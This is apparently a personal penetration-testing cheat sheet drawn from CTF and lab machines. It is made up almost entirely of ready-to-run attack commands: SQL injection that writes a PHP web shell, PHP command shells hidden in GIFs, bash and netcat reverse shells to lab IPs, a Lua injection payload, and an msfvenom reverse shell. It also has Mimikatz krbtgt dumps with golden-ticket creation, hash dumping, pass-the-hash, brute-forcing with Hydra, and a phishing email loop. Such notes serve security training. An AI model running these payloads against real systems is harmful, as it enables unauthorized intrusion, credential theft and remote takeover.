# PENETRATION TESTING NOTES

  1. pass the hash - authenticate as a user with the password hash instead of the plaintext password
  2. https://www.safetydetectives.com/is-website-secure/?url=http%3A%2F%2F167.99.72.221 - check website vulnerability

# WINDOWS CMD TIPS & TRICKS

  1. find equivalent - dir /s c:\file.txt
  2. findstr /R "something" . - search for a string (regex) in files

# FIND COMMANDS

# Find files:

find / -name Kernel.php 2>/dev/null

# Find SUID files:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.

find / -writable -type d 2>/dev/null      # world-writable directories
find / -perm -222 -type d 2>/dev/null     # world-writable directories
find / -perm -o w -type d 2>/dev/null     # world-writable directories

find / -perm -o x -type d 2>/dev/null     # world-executable directories
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null   # world-writable & executable directories
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writable directories without the sticky bit (current filesystem only)
find /dir -xdev \( -nouser -o -nogroup \) -print   # files with no owner or no group (current filesystem only)

find / -name perl*
find / -name python*
find / -name gcc*
find / -name c

# SHELL

cat file.txt | grep -v 'Size: 157' (hide every line containing "Size: 157")
# Fix terminal size: read rows/cols with `stty size`, then set them:
stty size
stty rows <value> cols <value>

# MYSQLI INJECTION

  1. 'union select 1, @@version-- - - get the database server version
  2. 'union select 1, table_name FROM information_schema.tables-- - - enumerate tables
  3. UNION SELECT 1, LOAD_FILE('/etc/passwd')-- - - read files from the server
  4. UNION SELECT 1, 0x3C3F7068702073797374656D28245F524551554553545B27636D64275D293B203F3E INTO OUTFILE '/var/www/html/plsgod.php'-- - - write a file via SQLi using a hex-encoded payload (filter bypass)
UNION SELECT char(60,104,116,109,108,62,60,98,111,100,121,62,60,112,62,72,105,32,105,116,32,119,111,114,107,115,33,60,47,112,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62), null INTO OUTFILE '/var/www/html/test.html'-- -
  • same file write using the char() function
  1. https://www.websec.ca/kb/sql_injection

# ACTIVE DIRECTORY [AD]

  1. enum4linux - enumerate SMB/NetBIOS on ports 139/445 [AD]
  2. nbtscan - enumerate NetBIOS names [AD]
  3. ./kerbrute_linux_amd64 userenum -v -d spookysec.local --dc 10.10.21.202 users.txt | grep VALID - kerbrute: enumerate valid domain users via Kerberos [AD]
  4. impacket - use to get hashes and more [AD]
  5. python3 /opt/impacket/examples/GetNPUsers.py spookysec.local/ -no-pass -usersfile validusers.txt -format hashcat - AS-REP roasting: request hashes for users without Kerberos pre-auth, output in hashcat format [AD]
  6. python3 /opt/impacket/examples/secretsdump.py -just-dc-ntlm/-just-dc 10.10.201.139/backup@10.10.201.139 - dump NTLM hashes (-just-dc-ntlm) or all secrets (-just-dc) from the DC [AD]
  7. ruby /opt/evil-winrm/evil-winrm.rb -i 10.10.36.142 -u USER -H 0e0363213e37b94221497260b0bcb4fc - pass the hash [AD]

# WINDOWS POST-EXPLOITATION

# POWERVIEW

  1. powershell -ep bypass - bypass the execution policy to run scripts [WPE]
  2. . .\PowerView.ps1 - start the powerview script [WPE]
  3. Get-NetUser | select cn - powerview enumerate domain users [WPE]
  4. Get-NetGroup -GroupName *admin* - powerview enumerate domain groups [WPE]
  5. Invoke-ShareFinder - powerview enumerate shared folder [WPE]
  6. Get-NetComputer -fulldata | select operatingsystem - powerview: enumerate operating systems of domain computers [WPE]

# BLOODHOUND (active directory mapping)

  1. powershell -ep bypass - bypassing execution policy
  2. . .\SharpHound.ps1
  3. Invoke-BloodHound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip - save mapping of the active directory [WPE]

# MIMIKATZ

  1. privilege::debug - check that mimikatz is running as administrator
  2. lsadump::lsa /patch - dump all hashes
  3. lsadump::lsa /inject /name:krbtgt - dump the krbtgt hash and the domain SID needed to create a golden ticket
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 5508500012cc005cf7082a9a89ebdfdf
    LM   :
  Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
    ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
    ntlm- 0: 372f405db05d3cafd27f8e6a4a097b2c
  1. kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500 - create golden ticket (/id:500 is the RID of the built-in Administrator account)
  2. misc::cmd - spawn a new shell with elevated privileges
  3. dir \\Desktop-1\c$ - access another computer in the domain (pivot)

# SUID ENUMERATIONS

  1. find / -perm -u=s -type f 2>/dev/null - [SUID]

# SAMBA ENUMERATIONS

  1. nmap -p445 --script smb-enum-shares.nse,smb-enum-users.nse $IP - enumerate SMB shares and users
  2. nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP - enumerate NFS mounts
  3. smbget -R smb://$IP/ - recursively download the contents of the shares
  4. showmount $IP - list the NFS exports available on the server
  5. smbclient \\\\10.10.201.139\\backup -U svc-user - connect to a share
  6. smbclient -L 10.10.201.139 -U svc-user - list shares
  7. smbmap

# GIT ENUMERATIONS

# HASHES

  1. Administrator:500:aaa3b435b51404eeaac3b435b51404ee:0e0363213e37b94221497260b0bcb4fc::: - NTLM hash
  2. hashcat -m 1710 -a 0 hash:salt /usr/share/wordlists/rockyou.txt - cracking hash with salt

# ZIP FILE CRACKING

  1. 7zipcrack - crack the password of a 7zip file
  2. fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt Found.zip - crack the password of a zip file (dictionary attack)
  3. 7z - open a 7zip archive
  4. fcrackzip -B - run a benchmark
  5. fcrackzip -v -m zip6 -l 4-8 -u secret.zip - crack a zip file whose password is 4-8 characters long

# BINARY EXPLOITATION

  1. hexeditor - view a binary in hex

# FORENSICS [FRS]

  1. search for wanted strings [FRS]
  2. follow the HTTP stream, then download all transferred content by exporting the HTTP objects [FRS]
  3. sudo tcpdump -s 0 -i tun0 -w tcpdump.pcap - capture traffic [FRS]
  4. tshark -r overpass2.pcapng -T fields -e ip.dst | sort | uniq -c - count packets per destination IP [FRS]
  5. tshark -r overpass2.pcapng ip.dst==192.168.170.159 | head - filter by destination IP [FRS]
  6. tshark -r overpass2.pcapng --export-objects "http,http-objects" - export HTTP objects [FRS]

# CRYPTOGRAPHY

  1. https://scwf.dima.ninja/

# STEGANOGRAPHY

  1. stegsolve - image steganography solver
  2. steghide (extract) : steghide extract -sf <filename> (press Enter for an empty passphrase)

# PROFTPD

  1. SITE CPFR $FILE - copy the target file into the buffer
  2. SITE CPTO $DESTINATIONPWD - paste the copied file into the destination path

# MSFVENOM

  1. msfvenom -p windows/shell_reverse_tcp LHOST=10.66.67.22 LPORT=9000 -f exe -o shell.exe

# SMTP

  1. python2 imapgrab.py -l -s sneakycorp.htb -u username -p 'password' - log in to the mail server [SMTP]
  2. python2 imapgrab.py -d -v -M -f ~/Documents/ctf/htb/sneakymailer/backup -s sneakycorp.htb -u paulbyrd -p '^(#J@SkFv2[%KhIxKk(JuhqcHl<:Ht' -m 'ALL' - download all mails
  3. evolution - open email with evolution app

# SMTP / IMAP COMMANDS

  • a LIST "" "*"
  • a LIST "" "INBOX/*"
  • a STATUS INBOX RECENT
  • a select inbox
HELO my.server.com
MAIL FROM: 
RCPT TO: 
DATA
From: Danny Dolittle 
To: Sarah Smith 
Subject: Email sample
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii

This is a test email for you to read.
.
QUIT

# FTP

  1. files can be uploaded with tftp

# SUBDOMAIN ENUMERATIONS / FUZZING

# WFUZZ

  1. wfuzz -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sneakycorp.htb -H 'Host: FUZZ.sneakycorp.htb' --hc 301
  2. ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sneakycorp.htb -H "Host:FUZZ.sneakycorp.htb"
  3. wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.1.202/FUZZ
  4. wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ - look for common directories
  5. wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ.php - for common files
  6. wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ - fuzzing parameters in url
  7. wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://minion.htb/userinfo.php - fuzzing post requests
  8. wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://minion.htb/FUZZ - fuzzing cookies
  9. wfuzz -z file,wordlist/general/common.txt -b cookie=FUZZ http://minion.htb/ - fuzzing cookies 2
  10. wfuzz -z file,wordlist/general/common.txt -H "myheader: headervalue" -H "myheader2: headervalue2" http://minion.htb/FUZZ - fuzzing custom headers
  11. wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://minion.htb/ - fuzzing http verbs
  12. wfuzz -z file,wordlist/general/common.txt -p localhost:8080 http://minion.htb/FUZZ - using a proxy
  13. wfuzz -z file,wordlist/general/common.txt -p localhost:2222:SOCKS5 http://minion.htb/FUZZ - using a SOCKS proxy

# SCRIPTS

  1. while read email; do swaks --to $email --from security@htb --body "goto http://10.10.14.69" --server sneakycorp.htb;done < email.txt

# BLUETOOTH HACKING

hcitool scan - scan for nearby Bluetooth devices

l2ping -i hci0 -s 600 -f 39:8C:14:6B:53:2D

# get a shell from a web app or web shell:
cd /var/tmp && echo '#!/bin/bash' >> test.sh && echo 'bash -i >& /dev/tcp/192.168.60.128/444 0>&1' >> test.sh && chmod 777 test.sh && ./test.sh
# web shell embedded in an uploaded image:
<?php $cmd=$_GET['cmd']; print('$cmd'); ?>

# REMOTE CODE EXECUTION (RCE)

<?php echo system($_GET['cmd']); ?>
<?php $_GET['param1']($_GET['param2']); ?>
echo "bash -i >& /dev/tcp/10.10.14.17/1234 0>&1" | base64

# Inject code to image or gif:

echo '<?php $cmd=$_GET["cmd"]; echo `$cmd`; ?>' >> bad.gif then upload
convert -delay 20 -loop 0 *.jpg example.gif --> convert images to a gif

http://192.168.0.10/imfadministrator/uploads/ad54eabb6fde.gif?cmd=ls -->> append ?cmd=<command> to run commands

# LOCAL FILE INCLUSIONS (LFI)

php://filter/convert.base64-encode/resource=config http://172.20.10.3/?page=php://filter/convert.base64-encode/resource=config

# WEBSITE/PAGE VULNERABILITY

check for LFI vulnerabilities when the URL has a ?page=<input> structure. The Kadimus tool (https://github.com/P0cL4bs/Kadimus) can be used: ./kadimus -u 192.168.246.105/?page=login ---> must be run from its own directory; third-party tools are always in /opt

strings filename.{png,bmp,jpg} # Stego

cewl $ip -w cewl.txt - build a custom wordlist from the site's content

# HYDRA

# hydra http

hydra -l <username> -P <wordlist> <IP> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid Password"

# hydra smtp attack

hydra -s 25 -v -V -l test@example.com -P /path/to/password/list.lst -t 1 -w 20 -f 192.168.10.5 smtp

# hydra ssh attack

hydra -L users.txt -P passwords.txt ssh://10.10.10.7 
hydra <ip address> ssh -vV -L <login list> -P <password list> -e s -t 10

# SQLMAP

sqlmap: in Burp, copy the login (or other) request in full, paste it into a file and save it as login.req, then run it with `sqlmap -r login.req` (IMPORTANT)
sqlmap -u http://192.168.246.105/?page=login --data="user=user&pass=pass&submit=Login" -p user --dbms mysql --risk=3 --level=3
sqlmap -r capture.txt --dbs --threads 10 --level 5 --risk 3
sqlmap --level 5 --risk 3 --url "http://172.20.10.3/?page=add_value*"
sqlmap -D database --tables --url <url>
sqlmap --dbs --tables --url <url>
sqlmap --tables -D databasename --url <url>
sqlmap --columns -D databasename -T tablename --url <url>

# SSH

# SSH login with id_rsa:

ssh -i id_rsa username@ip

# Send email with telnet over port 25

telnet ip 25
EHLO or HELO druckkammer.machine.htb <--- the domain name does not matter; any value works
VRFY username@localhost <-- optional
mail from:<gillbates@microsucks.com>
rcpt to:<username@localhost>
data
Subject: YOU GOT OWNED <-- example 
MESSAGE OR SHELL CODE HERE!

# LUA RCE

  1. /weather/forecast?city=London')%3bos.execute("rm++/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.69+9001+>/tmp/f")-- - unsanitized input leads to Lua code execution

# GPG ENCRYPT / DECRYPT

  1. netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output /tmp/idk.gz - decrypt a PGP-encrypted file